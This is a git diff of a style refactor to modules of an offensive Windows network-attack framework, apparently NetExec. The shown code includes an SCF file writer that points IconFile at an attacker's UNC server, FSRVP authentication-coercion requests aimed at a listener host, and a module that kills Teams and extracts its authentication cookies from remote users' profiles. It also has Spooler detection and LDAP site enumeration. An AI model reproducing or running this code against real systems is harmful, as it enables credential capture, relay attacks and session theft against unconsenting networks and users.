import ntpath
|
import ntpath
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
|
||||||
|
@ -52,11 +49,11 @@ class NXCModule:
|
||||||
|
|
||||||
if not self.cleanup:
|
if not self.cleanup:
|
||||||
self.server = module_options["SERVER"]
|
self.server = module_options["SERVER"]
|
||||||
scuf = open(self.scf_path, "a")
|
|
||||||
scuf.write(f"[Shell]\n")
|
with open(self.scf_path, "a") as scuf:
|
||||||
scuf.write(f"Command=2\n")
|
scuf.write("[Shell]\n")
|
||||||
scuf.write(f"IconFile=\\\\{self.server}\\share\\icon.ico\n")
|
scuf.write("Command=2\n")
|
||||||
scuf.close()
|
scuf.write(f"IconFile=\\\\{self.server}\\share\\icon.ico\n")
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
shares = connection.shares()
|
shares = connection.shares()
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import time
|
import time
|
||||||
from impacket import system_errors
|
from impacket import system_errors
|
||||||
from impacket.dcerpc.v5 import transport
|
from impacket.dcerpc.v5 import transport
|
||||||
|
@ -101,13 +98,9 @@ class DCERPCSessionError(DCERPCException):
|
||||||
if key in error_messages:
|
if key in error_messages:
|
||||||
error_msg_short = error_messages[key][0]
|
error_msg_short = error_messages[key][0]
|
||||||
error_msg_verbose = error_messages[key][1]
|
error_msg_verbose = error_messages[key][1]
|
||||||
return "SessionError: code: 0x%x - %s - %s" % (
|
return f"SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
|
||||||
self.error_code,
|
|
||||||
error_msg_short,
|
|
||||||
error_msg_verbose,
|
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
return "SessionError: unknown error code: 0x%x" % self.error_code
|
return f"SessionError: unknown error code: 0x{self.error_code:x}"
|
||||||
|
|
||||||
|
|
||||||
################################################################################
|
################################################################################
|
||||||
|
@ -229,7 +222,7 @@ class CoerceAuth:
|
||||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||||
|
|
||||||
nxc_logger.info("Connecting to %s" % binding_params[pipe]["stringBinding"])
|
nxc_logger.info(f"Connecting to {binding_params[pipe]['stringBinding']}")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
dce.connect()
|
dce.connect()
|
||||||
|
@ -239,14 +232,14 @@ class CoerceAuth:
|
||||||
dce.disconnect()
|
dce.disconnect()
|
||||||
return 1
|
return 1
|
||||||
|
|
||||||
nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
|
nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
|
|
||||||
nxc_logger.info("Connected!")
|
nxc_logger.info("Connected!")
|
||||||
nxc_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0])
|
nxc_logger.info(f"Binding to {binding_params[pipe]['UUID'][0]}")
|
||||||
try:
|
try:
|
||||||
dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"]))
|
dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"]))
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
|
nxc_logger.debug(f"Something went wrong, check error status => {e!s}")
|
||||||
|
|
||||||
nxc_logger.info("Successfully bound!")
|
nxc_logger.info("Successfully bound!")
|
||||||
return dce
|
return dce
|
||||||
|
@ -257,8 +250,7 @@ class CoerceAuth:
|
||||||
request = IsPathShadowCopied()
|
request = IsPathShadowCopied()
|
||||||
# only NETLOGON and SYSVOL were detected working here
|
# only NETLOGON and SYSVOL were detected working here
|
||||||
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
|
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
|
||||||
request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
|
request["ShareName"] = f"\\\\{listener}\\NETLOGON\x00"
|
||||||
# request.dump()
|
|
||||||
dce.request(request)
|
dce.request(request)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
nxc_logger.debug("Something went wrong, check error status => %s", str(e))
|
nxc_logger.debug("Something went wrong, check error status => %s", str(e))
|
||||||
|
@ -273,7 +265,7 @@ class CoerceAuth:
|
||||||
request = IsPathSupported()
|
request = IsPathSupported()
|
||||||
# only NETLOGON and SYSVOL were detected working here
|
# only NETLOGON and SYSVOL were detected working here
|
||||||
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
|
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
|
||||||
request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
|
request["ShareName"] = f"\\\\{listener}\\NETLOGON\x00"
|
||||||
dce.request(request)
|
dce.request(request)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
nxc_logger.debug("Something went wrong, check error status => %s", str(e))
|
nxc_logger.debug("Something went wrong, check error status => %s", str(e))
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import pylnk3
|
import pylnk3
|
||||||
import ntpath
|
import ntpath
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
@ -33,7 +30,6 @@ class NXCModule:
|
||||||
NAME LNK file name
|
NAME LNK file name
|
||||||
CLEANUP Cleanup (choices: True or False)
|
CLEANUP Cleanup (choices: True or False)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.cleanup = False
|
self.cleanup = False
|
||||||
|
|
||||||
if "CLEANUP" in module_options:
|
if "CLEANUP" in module_options:
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py
|
# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py
|
||||||
from impacket import uuid
|
from impacket import uuid
|
||||||
from impacket.dcerpc.v5 import transport, epm
|
from impacket.dcerpc.v5 import transport, epm
|
||||||
|
@ -36,9 +33,7 @@ class NXCModule:
|
||||||
self.port = None
|
self.port = None
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""PORT Port to check (defaults to 135)"""
|
||||||
PORT Port to check (defaults to 135)
|
|
||||||
"""
|
|
||||||
self.port = 135
|
self.port = 135
|
||||||
if "PORT" in module_options:
|
if "PORT" in module_options:
|
||||||
self.port = int(module_options["PORT"])
|
self.port = int(module_options["PORT"])
|
||||||
|
@ -49,7 +44,7 @@ class NXCModule:
|
||||||
nthash = getattr(connection, "nthash", "")
|
nthash = getattr(connection, "nthash", "")
|
||||||
|
|
||||||
self.__stringbinding = KNOWN_PROTOCOLS[self.port]["bindstr"] % connection.host
|
self.__stringbinding = KNOWN_PROTOCOLS[self.port]["bindstr"] % connection.host
|
||||||
context.log.debug("StringBinding %s" % self.__stringbinding)
|
context.log.debug(f"StringBinding {self.__stringbinding}")
|
||||||
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
|
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
|
||||||
rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash)
|
rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash)
|
||||||
rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + "." + connection.domain)
|
rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + "." + connection.domain)
|
||||||
|
@ -61,11 +56,11 @@ class NXCModule:
|
||||||
try:
|
try:
|
||||||
entries = self.__fetch_list(rpctransport)
|
entries = self.__fetch_list(rpctransport)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
error_text = "Protocol failed: %s" % e
|
error_text = f"Protocol failed: {e}"
|
||||||
context.log.critical(error_text)
|
context.log.critical(error_text)
|
||||||
|
|
||||||
if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
|
if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
|
||||||
context.log.critical("This usually means the target does not allow " "to connect to its epmapper using RpcProxy.")
|
context.log.critical("This usually means the target does not allow to connect to its epmapper using RpcProxy.")
|
||||||
return
|
return
|
||||||
|
|
||||||
# Display results.
|
# Display results.
|
||||||
|
@ -76,27 +71,21 @@ class NXCModule:
|
||||||
tmp_uuid = str(entry["tower"]["Floors"][0])
|
tmp_uuid = str(entry["tower"]["Floors"][0])
|
||||||
if (tmp_uuid in endpoints) is not True:
|
if (tmp_uuid in endpoints) is not True:
|
||||||
endpoints[tmp_uuid] = {}
|
endpoints[tmp_uuid] = {}
|
||||||
endpoints[tmp_uuid]["Bindings"] = list()
|
endpoints[tmp_uuid]["Bindings"] = []
|
||||||
if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] in epm.KNOWN_UUIDS:
|
endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS.get(uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18], "N/A")
|
||||||
endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18]]
|
|
||||||
else:
|
|
||||||
endpoints[tmp_uuid]["EXE"] = "N/A"
|
|
||||||
endpoints[tmp_uuid]["annotation"] = entry["annotation"][:-1].decode("utf-8")
|
endpoints[tmp_uuid]["annotation"] = entry["annotation"][:-1].decode("utf-8")
|
||||||
endpoints[tmp_uuid]["Bindings"].append(binding)
|
endpoints[tmp_uuid]["Bindings"].append(binding)
|
||||||
|
|
||||||
if tmp_uuid[:36] in epm.KNOWN_PROTOCOLS:
|
endpoints[tmp_uuid]["Protocol"] = epm.KNOWN_PROTOCOLS.get(tmp_uuid[:36], "N/A")
|
||||||
endpoints[tmp_uuid]["Protocol"] = epm.KNOWN_PROTOCOLS[tmp_uuid[:36]]
|
|
||||||
else:
|
|
||||||
endpoints[tmp_uuid]["Protocol"] = "N/A"
|
|
||||||
|
|
||||||
for endpoint in list(endpoints.keys()):
|
for endpoint in list(endpoints.keys()):
|
||||||
if "MS-RPRN" in endpoints[endpoint]["Protocol"]:
|
if "MS-RPRN" in endpoints[endpoint]["Protocol"]:
|
||||||
context.log.debug("Protocol: %s " % endpoints[endpoint]["Protocol"])
|
context.log.debug(f"Protocol: {endpoints[endpoint]['Protocol']} ")
|
||||||
context.log.debug("Provider: %s " % endpoints[endpoint]["EXE"])
|
context.log.debug(f"Provider: {endpoints[endpoint]['EXE']} ")
|
||||||
context.log.debug("UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"]))
|
context.log.debug(f"UUID : {endpoint} {endpoints[endpoint]['annotation']}")
|
||||||
context.log.debug("Bindings: ")
|
context.log.debug("Bindings: ")
|
||||||
for binding in endpoints[endpoint]["Bindings"]:
|
for binding in endpoints[endpoint]["Bindings"]:
|
||||||
context.log.debug(" %s" % binding)
|
context.log.debug(f" {binding}")
|
||||||
context.log.debug("")
|
context.log.debug("")
|
||||||
context.log.highlight("Spooler service enabled")
|
context.log.highlight("Spooler service enabled")
|
||||||
try:
|
try:
|
||||||
|
@ -110,18 +99,18 @@ class NXCModule:
|
||||||
host.signing,
|
host.signing,
|
||||||
spooler=True,
|
spooler=True,
|
||||||
)
|
)
|
||||||
except Exception as e:
|
except Exception:
|
||||||
context.log.debug(f"Error updating spooler status in database")
|
context.log.debug("Error updating spooler status in database")
|
||||||
break
|
break
|
||||||
|
|
||||||
if entries:
|
if entries:
|
||||||
num = len(entries)
|
num = len(entries)
|
||||||
if 1 == num:
|
if num == 1:
|
||||||
context.log.debug(f"[Spooler] Received one endpoint")
|
context.log.debug("[Spooler] Received one endpoint")
|
||||||
else:
|
else:
|
||||||
context.log.debug(f"[Spooler] Received {num} endpoints")
|
context.log.debug(f"[Spooler] Received {num} endpoints")
|
||||||
else:
|
else:
|
||||||
context.log.debug(f"[Spooler] No endpoints found")
|
context.log.debug("[Spooler] No endpoints found")
|
||||||
|
|
||||||
def __fetch_list(self, rpctransport):
|
def __fetch_list(self, rpctransport):
|
||||||
dce = rpctransport.get_dce_rpc()
|
dce = rpctransport.get_dce_rpc()
|
||||||
|
|
|
@ -1,10 +1,9 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
|
from impacket.ldap.ldap import LDAPSearchError
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
def searchResEntry_to_dict(results):
|
def search_res_entry_to_dict(results):
|
||||||
data = {}
|
data = {}
|
||||||
for attr in results["attributes"]:
|
for attr in results["attributes"]:
|
||||||
key = str(attr["type"])
|
key = str(attr["type"])
|
||||||
|
@ -22,10 +21,7 @@ class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""Showservers Toggle printing of servers (default: true)"""
|
||||||
showservers Toggle printing of servers (default: true)
|
|
||||||
"""
|
|
||||||
|
|
||||||
self.showservers = True
|
self.showservers = True
|
||||||
self.base_dn = None
|
self.base_dn = None
|
||||||
|
|
||||||
|
@ -52,38 +48,40 @@ class NXCModule:
|
||||||
|
|
||||||
try:
|
try:
|
||||||
list_sites = connection.ldapConnection.search(
|
list_sites = connection.ldapConnection.search(
|
||||||
searchBase="CN=Configuration,%s" % dn,
|
searchBase=f"CN=Configuration,{dn}",
|
||||||
searchFilter="(objectClass=site)",
|
searchFilter="(objectClass=site)",
|
||||||
attributes=["distinguishedName", "name", "description"],
|
attributes=["distinguishedName", "name", "description"],
|
||||||
sizeLimit=999,
|
sizeLimit=999,
|
||||||
)
|
)
|
||||||
except LDAPSearchError as e:
|
except LDAPSearchError as e:
|
||||||
context.log.fail(str(e))
|
context.log.fail(str(e))
|
||||||
exit()
|
sys.exit()
|
||||||
|
|
||||||
for site in list_sites:
|
for site in list_sites:
|
||||||
if isinstance(site, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(site, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
site = searchResEntry_to_dict(site)
|
site = search_res_entry_to_dict(site)
|
||||||
site_dn = site["distinguishedName"]
|
site_dn = site["distinguishedName"]
|
||||||
site_name = site["name"]
|
site_name = site["name"]
|
||||||
site_description = ""
|
site_description = ""
|
||||||
if "description" in site.keys():
|
if "description" in site:
|
||||||
site_description = site["description"]
|
site_description = site["description"]
|
||||||
|
|
||||||
# Getting subnets of this site
|
# Getting subnets of this site
|
||||||
list_subnets = connection.ldapConnection.search(
|
list_subnets = connection.ldapConnection.search(
|
||||||
searchBase="CN=Sites,CN=Configuration,%s" % dn,
|
searchBase=f"CN=Sites,CN=Configuration,{dn}",
|
||||||
searchFilter="(siteObject=%s)" % site_dn,
|
searchFilter=f"(siteObject={site_dn})",
|
||||||
attributes=["distinguishedName", "name"],
|
attributes=["distinguishedName", "name"],
|
||||||
sizeLimit=999,
|
sizeLimit=999,
|
||||||
)
|
)
|
||||||
if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0:
|
if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0:
|
||||||
context.log.highlight('Site "%s"' % site_name)
|
context.log.highlight(f'Site "{site_name}"')
|
||||||
else:
|
else:
|
||||||
for subnet in list_subnets:
|
for subnet in list_subnets:
|
||||||
if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
subnet = searchResEntry_to_dict(subnet)
|
subnet = search_res_entry_to_dict(subnet)
|
||||||
subnet_dn = subnet["distinguishedName"]
|
subnet["distinguishedName"]
|
||||||
subnet_name = subnet["name"]
|
subnet_name = subnet["name"]
|
||||||
|
|
||||||
if self.showservers:
|
if self.showservers:
|
||||||
|
@ -96,28 +94,20 @@ class NXCModule:
|
||||||
)
|
)
|
||||||
if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0:
|
if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0:
|
||||||
if len(site_description) != 0:
|
if len(site_description) != 0:
|
||||||
context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description))
|
context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name}) (description:"{site_description}")')
|
||||||
else:
|
else:
|
||||||
context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name))
|
context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name})')
|
||||||
else:
|
else:
|
||||||
for server in list_servers:
|
for server in list_servers:
|
||||||
if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
server = searchResEntry_to_dict(server)["cn"]
|
server = search_res_entry_to_dict(server)["cn"]
|
||||||
if len(site_description) != 0:
|
if len(site_description) != 0:
|
||||||
context.log.highlight(
|
context.log.highlight(f"Site: '{site_name}' (Subnet:{subnet_name}) (description:'{site_description}') (Server:'{server}')")
|
||||||
'Site "%s" (Subnet:%s) (description:"%s") (Server:%s)'
|
|
||||||
% (
|
|
||||||
site_name,
|
|
||||||
subnet_name,
|
|
||||||
site_description,
|
|
||||||
server,
|
|
||||||
)
|
|
||||||
)
|
|
||||||
else:
|
else:
|
||||||
context.log.highlight('Site "%s" (Subnet:%s) (Server:%s)' % (site_name, subnet_name, server))
|
context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name}) (Server:{server})')
|
||||||
else:
|
else:
|
||||||
if len(site_description) != 0:
|
if len(site_description) != 0:
|
||||||
context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description))
|
context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name}) (description:"{site_description}")')
|
||||||
else:
|
else:
|
||||||
context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name))
|
context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name})')
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
import sqlite3
|
import sqlite3
|
||||||
|
|
||||||
|
|
||||||
|
@ -17,7 +14,6 @@ class NXCModule:
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
context.log.display("Killing all Teams process to open the cookie file")
|
context.log.display("Killing all Teams process to open the cookie file")
|
||||||
connection.execute("taskkill /F /T /IM teams.exe")
|
connection.execute("taskkill /F /T /IM teams.exe")
|
||||||
# sleep(3)
|
|
||||||
found = 0
|
found = 0
|
||||||
paths = connection.spider("C$", folder="Users", regex=["[a-zA-Z0-9]*"], depth=0)
|
paths = connection.spider("C$", folder="Users", regex=["[a-zA-Z0-9]*"], depth=0)
|
||||||
with open("/tmp/teams_cookies2.txt", "wb") as f:
|
with open("/tmp/teams_cookies2.txt", "wb") as f:
|
||||||
|
@ -48,7 +44,7 @@ class NXCModule:
|
||||||
if row is None:
|
if row is None:
|
||||||
context.log.fail("No " + name + " present in Microsoft Teams Cookies database")
|
context.log.fail("No " + name + " present in Microsoft Teams Cookies database")
|
||||||
else:
|
else:
|
||||||
context.log.success("Succesfully extracted " + name + ": ")
|
context.log.success("Successfully extracted " + name + ": ")
|
||||||
context.log.success(row[0])
|
context.log.success(row[0])
|
||||||
conn.close()
|
conn.close()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
|
||||||
|
|
||||||
|
@ -17,9 +14,7 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""HOST Host to ping"""
|
||||||
HOST Host to ping
|
|
||||||
"""
|
|
||||||
self.host = None
|
self.host = None
|
||||||
|
|
||||||
if "HOST" not in module_options:
|
if "HOST" not in module_options:
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue